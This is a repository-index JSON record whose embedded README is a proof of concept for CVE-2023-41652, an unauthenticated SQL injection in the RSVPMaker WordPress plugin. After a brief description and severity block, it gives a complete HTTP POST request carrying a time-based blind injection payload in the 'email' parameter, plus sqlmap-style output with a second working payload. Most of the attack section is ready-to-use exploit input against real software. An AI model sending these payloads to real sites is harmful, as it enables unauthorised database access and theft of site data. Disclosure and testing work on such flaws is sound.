{"id":21125670,"url":"https://github.com/randomrobbiebf/cve-2023-41652","last_synced_at":"2026-04-01T21:49:56.543Z","repository":{"id":261599388,"uuid":"884788732","full_name":"RandomRobbieBF/CVE-2023-41652","owner":"RandomRobbieBF","description":"RSVPMarker \u003c= 10.6.6 - Unauthenticated SQL Injection","archived":false,"fork":false,"pushed_at":"2024-11-07T11:51:50.000Z","size":4,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-03-28T00:22:59.931Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/RandomRobbieBF.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-11-07T11:49:36.000Z","updated_at":"2024-11-07T11:51:54.000Z","dependencies_parsed_at":"2024-11-07T12:40:35.150Z","dependency_job_id":"b3f27408-a1d1-4eb5-b501-ed8d12e33b13","html_url":"https://github.com/RandomRobbieBF/CVE-2023-41652","commit_stats":null,"previous_names":["randomrobbiebf/cve-2023-41652"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/RandomRobbieBF/CVE-2023-41652","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-41652","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-41652/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-41652/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-41652/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/RandomRobbieBF","download_url":"https://codeload.github.com/RandomRobbieBF/CVE-2023-41652/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-41652/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":31292562,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-01T21:15:39.731Z","status":"ssl_error","status_checked_at":"2026-04-01T21:15:34.046Z","response_time":53,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-20T04:36:18.562Z","updated_at":"2026-04-01T21:49:56.524Z","avatar_url":"https://github.com/RandomRobbieBF.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# CVE-2023-41652\nRSVPMarker \u0026lt;= 10.6.6 - Unauthenticated SQL Injection\n\n\n# Description:\nThe RSVPMarker  plugin for WordPress is vulnerable to SQL Injection via the 'email' parameter in versions up to, and including, 10.6.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n\n```\nSeverity: critical\nCVE ID: CVE-2023-41652\nCVSS Score: 9.8\nCVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\nPlugin Slug: rsvpmaker\nWPScan URL: https://www.wpscan.com/plugin/rsvpmaker\nReference URL: https://www.wordfence.com/threat-intel/vulnerabilities/id/f655704d-70a1-40d8-ae36-39029185d262?source=api-prod\n```\n\nPOC\n---\n```\nPOST /wp-json/rsvpmaker/v1/rsvpmailer_member/test@example.com HTTP/1.1\nHost: kubernetes.docker.internal\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: https://kubernetes.docker.internal/\nX-Requested-With: XMLHttpRequest\nOrigin: http://kubernetes.docker.internal\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\nConnection: keep-alive\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 22\n\nemail=test@example.com'%20and%20(select*from(select(sleep(5)))a)--%20\n```\n\n```\nParameter: email (POST)\n    Type: time-based blind\n    Title: MySQL \u003e= 5.0.12 time-based blind (query SLEEP)\n    Payload: email=test@example.com'XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2023-41652","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frandomrobbiebf%2Fcve-2023-41652","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2023-41652/lists"}